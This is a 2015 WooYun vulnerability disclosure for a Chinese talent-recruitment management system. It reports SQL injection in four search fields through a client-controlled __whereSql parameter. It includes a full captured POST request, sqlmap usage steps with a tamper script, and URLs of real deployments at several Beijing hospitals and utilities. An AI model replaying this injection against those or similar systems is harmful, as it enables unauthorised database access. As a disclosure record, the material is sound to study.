当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104170

漏洞标题:某人才招聘管理系统通用sql注入漏洞4处打包

相关厂商:鼎讯同创

漏洞作者: bitcoin

提交时间:2015-03-30 12:34

修复时间:2015-07-02 14:36

公开时间:2015-07-02 14:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-30: 细节已通知厂商并且等待厂商处理中
2015-04-03: 厂商已经确认,细节仅向厂商公开
2015-04-06: 细节向第三方安全合作伙伴开放
2015-05-28: 细节向核心白帽子及相关领域专家公开
2015-06-07: 细节向普通白帽子公开
2015-06-17: 细节向实习白帽子公开
2015-07-02: 细节向公众公开

简要描述:

4处注入

详细说明:

北京鼎讯同创技术有限公司旗下鼎讯人才招聘管理系统
四处注入点分别位于招聘查询处的单位名称,专业,学历,招聘职位四个地方
以北京大学第一医院为例,进行演示
http://123.124.148.248:8888/dap/dtalent/drs/default/commonPage.jsp?innercode=007
搜索111111

1.jpg


burp截包

POST /dap/dframe/ext.AJAX.f?__ajax=true HTTP/1.1
Host: 123.124.148.248:8888
Proxy-Connection: keep-alive
Content-Length: 1235
Pragma: no-cache
Origin: http://123.124.148.248:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://123.124.148.248:8888/dap/dtalent/drs/default/vacancy_list.jsp?channel=3&innercode=001
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: JSESSIONID=1902471DA6316729384C2CD0B6A9C025
_rt=loadData&_fid=net.dxtek.dtalent.drs.bs.VacancyList~net.dxtek.dtalent.drs.bs.VacancyListFramelet&_xml=%3Crpc%20id%3D%22dsVacancy%22%20type%3D%22wrapper%22%20objectclazz%3D%22undefined%22%20pi%3D%221%22%20ps%3D%2230%22%20pc%3D%221%22%20prc%3D%220%22%20fs%3D%22pk_vacancy%2Cpk_corp%2Cpk_dept%2Cpublishdate%2Cunitname%2Cdeptname%2Cedureq%2Cedureq_showname%2Cgenderreq%2Cgenderreq_showname%2Crequirecount%2Cworkplace%2Cishot%2Creleasedate%2Cmajorreq%2Cmajornamereq%2Cjob_name%2Cchannel%2Cpk_choose%2Cinnercode%2Cdept_innercode%2Cposition_innercode%2Cmajorreq_showname%2Cid%22%3E%3Cps%3E%3Cp%20name%3D%22channel%22%3E3%3C/p%3E%3Cp%20name%3D%22__fieldValue_0%22%3E001%2525%3C/p%3E%3Cp%20name%3D%22__fieldValue_1%22%3E%2525002%2525%3C/p%3E%3Cp%20name%3D%22__fieldValue_2%22%3E010%3C/p%3E%3Cp%20name%3D%22__fieldValue_3%22%3E%2525111111%2525%3C/p%3E%3Cp%20name%3D%22__whereSql%22%3Edp_organization.innercode%2520like%2520%253A__fieldValue_0%2520and%2520dt_vacancy.majorreq%2520like%2520%253A__fieldValue_1%2520and%2520dt_vacancy.edureq%2520%253D%2520%253A__fieldValue_2%2520and%2520dt_vacancy.job_name%2520like%2520%253A__fieldValue_3%3C/p%3E%3C/ps%3E%3Cvps%3E%3Cp%20name%3D%22isUseRauthCode%22%3E1%3C/p%3E%3C/vps%3E%3C/rpc%3E&1427426959721


对post提交的数据进行url解码,为

_rt=loadData&_fid=net.dxtek.dtalent.drs.bs.VacancyList~net.dxtek.dtalent.drs.bs.VacancyListFramelet&_xml=<rpc id="dsVacancy" type="wrapper" objectclazz="undefined" pi="1" ps="30" pc="1" prc="0" fs="pk_vacancy,pk_corp,pk_dept,publishdate,unitname,deptname,edureq,edureq_showname,genderreq,genderreq_showname,requirecount,workplace,ishot,releasedate,majorreq,majornamereq,job_name,channel,pk_choose,innercode,dept_innercode,position_innercode,majorreq_showname,id"><ps><p name="channel">3</p><p name="__fieldValue_0">001%</p><p name="__fieldValue_1">%002%</p><p name="__fieldValue_2">010</p><p name="__fieldValue_3">%111111%</p><p name="__whereSql">dp_organization.innercode like :__fieldValue_0* and dt_vacancy.majorreq like :__fieldValue_1 and dt_vacancy.edureq = :__fieldValue_2 and dt_vacancy.job_name like :__fieldValue_3</p></ps><vps><p name="isUseRauthCode">1</p></vps></rpc>&1427426959721


可以看出未过滤的参数分别为dp_organization.innercode,dt_vacancy.majorreq,dt_vacancy.job_name,dt_vacancy.edureq
下面用sqlmap跑数据
比如跑dp_organization.innercode
则在dp_organization.innercode%2520like%2520%253A__fieldValue_0*%2520
中加上*号
另外采用的是like方式
则需要加入--tamper equaltolike.py

can1.jpg


can2.jpg


另外几个案例
北京市燃气集团
http://114.242.137.125/dap/dtalent/drs/default/commonPage.jsp?innercode=007

114.jpg


1141.jpg


博天环境
http://211.103.167.51/dtalent/dtalent/drs/default/multi_detail.jsp?channel=4&pk_vacancy=11405161444332860366&innercode=002
首都医科大学宣武医院
http://hr.xwhosp.com.cn/dtalent/dtalent/drs/default/multi_detail.jsp?channel=4&pk_vacancy=11411041305095210870&innercode=001
北京朝阳医院
http://zhaopin.bjcyh.com/dap/dtalent/drs/default/multi_detail.jsp?channel=3&pk_vacancy=11411191153554950578&innercode=001

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 bitcoin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-04-03 14:35

厂商回复:

此前已经通报过厂商类似漏洞,不再重复通报。

最新状态:

暂无